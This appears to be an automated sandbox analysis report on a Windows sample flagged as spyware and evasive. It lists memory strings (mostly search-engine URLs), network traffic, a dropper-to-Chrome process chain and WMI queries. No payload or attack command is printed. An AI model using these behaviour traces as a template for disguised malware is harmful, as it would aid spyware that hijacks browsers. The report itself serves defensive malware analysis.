Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32744920207.00005C8C0339C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32744308626.00005C8C032D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ve.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ve.search.yahoo.com/favicon.icohttps://ve.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ve.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ve.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vn.search.yahoo.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vn.search.yahoo.com/favicon.icohttps://vn.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vn.search.yahoo.com/search
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vn.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amd.com/en/support/apu/amd-series-processors/amd-a8-series-apu-for-laptops/a8-5550m-rade
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ask.com/web?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ask.com/wp-content/uploads/sites/3/2021/10/ask-favicon.png
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ask.com/wp-content/uploads/sites/3/2021/10/ask-favicon.pnghttps://www.ask.com/web?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/#ie=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/favicon.icohttps://www.baidu.com/#ie=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.delfi.lt/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.delfi.lt/favicon.icohttps://www.delfi.lt/paieska/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.delfi.lt/paieska/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32745016713.00005C8C033C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.givero.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.givero.com/favicon.icohttps://www.givero.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.givero.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.givero.com/suggest?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32741436014.00005C8C02DA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32738330298.00005C8C02774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32739685764.00005C8C02A98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.32322473496.00005C8C02744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: EpicUpdate.exe, 00000002.00000003.32355877138.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32742121439.00005C8C02ED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGJX
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.info.com/serp?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.info.com/static/www.info.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.info.com/static/www.info.com/favicon.icohttps://www.info.com/serp?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.lilo.org/wp-content/themes/jarvis_wp/ajans/assets/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.lilo.org/wp-content/themes/jarvis_wp/ajans/assets/favicon.icohttps://search.lilo.org/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mojeek.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mojeek.com/favicon.icohttps://www.mojeek.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mojeek.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nona.de/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nona.de/autocomplete/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nona.de/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nona.de/favicon.icohttps://www.nona.de/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.privacywall.org/images/favicon_32x32.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.privacywall.org/images/favicon_32x32.icohttps://www.privacywall.org/search/secure/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.privacywall.org/newtab/
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.privacywall.org/newtab/h
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.privacywall.org/search/secure/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.quendu.com/search?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.quendu.com/suggest?query=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qwant.com/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qwant.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qwant.com/favicon.icohttps://www.qwant.com/?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.so.com/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.so.com/favicon.icohttps://www.so.com/s?ie=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.so.com/s?ie=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sogou.com/images/logo/old/favicon.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sogou.com/images/logo/old/favicon.icohttps://www.sogou.com/web?ie=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sogou.com/web?ie=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.yandex.by/chrome/newtab
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.yandex.com.tr/
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.yandex.com.tr/chrome/newtab
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.yandex.kz/chrome/newtab
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.yandex.ua/chrome/newtab
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.by/
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.by/images/search/?rpt=imageview
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.by/images/search/?rpt=imageviewhttps://www.yandex.by/chrome/newtabhttps://storage.ape
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.com.tr/gorsel/search?rpt=imageview
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.com.tr/gorsel/search?rpt=imageviewhttps://www.yandex.com.tr/chrome/newtab
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.com/images/search?rpt=imageview
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.com/search/?text=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.kz/
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.kz/images/search/?rpt=imageview
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.kz/images/search/?rpt=imageviewhttps://www.yandex.kz/chrome/newtabp
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.ua/
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.ua/images/search/?rpt=imageview
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yandex.ua/images/search/?rpt=imageviewhttps://www.yandex.ua/chrome/newtabp
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.icohttps://yandex.by/
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.icohttps://yandex.com/search/?text=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yep.com/web?q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://you.com/api/ac?domain=default&q=
Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://you.com/search?tbm=youchat&q=

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 52.113.194.132:443 -> 192.168.11.20:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.165:443 -> 192.168.11.20:49772 version: TLS 1.2

Source: EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices() failed for RIDEV_REMOVE

memstr_0d19808d-f

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@35/4@5/4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

File created: C:\Users\user\AppData\Local\Temp\temp_bRBfgSMcTpYCpANwkGLzu

Jump to behavior

Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000003.00000002.32750416934.00005C8C04104000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31846836441.000001ECC2F1A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC321F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC3121000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Select the interlaced (i) or progressive (p) refresh rate from the list.;
Source: chrome.exe, 00000003.00000002.32750416934.00005C8C04104000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
Source: chrome.exe, 00000003.00000002.32750416934.00005C8C04104000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';c ca
Source: chrome.exe, 00000003.00000002.32748102803.00005C8C039F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32744878310.00005C8C03394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.32423714979.00005C8C02CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32744703430.00005C8C03368000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
Source: chrome.exe, 00000003.00000002.32748102803.00005C8C039F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32744878310.00005C8C03394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.32423714979.00005C8C02CC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32744703430.00005C8C03368000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
Source: chrome.exe, 00000003.00000002.32750416934.00005C8C04104000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';c ca
Source: chrome.exe, 00000003.00000002.32750416934.00005C8C04104000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
Source: chrome.exe, 00000003.00000002.32742977949.00005C8C03034000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';

Source: SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe

ReversingLabs: Detection: 57%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Process created: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe "C:\Users\user\AppData\Local\Temp\EpicUpdate.exe"
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2224,i,15343665010239501280,16387244067859444287,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2244 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=4452,i,15343665010239501280,16387244067859444287,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=3824 /prefetch:3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Process created: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe "C:\Users\user\AppData\Local\Temp\EpicUpdate.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2224,i,15343665010239501280,16387244067859444287,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2244 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=4452,i,15343665010239501280,16387244067859444287,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=3824 /prefetch:3	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	Section loaded: apphelp.dll	Jump to behavior
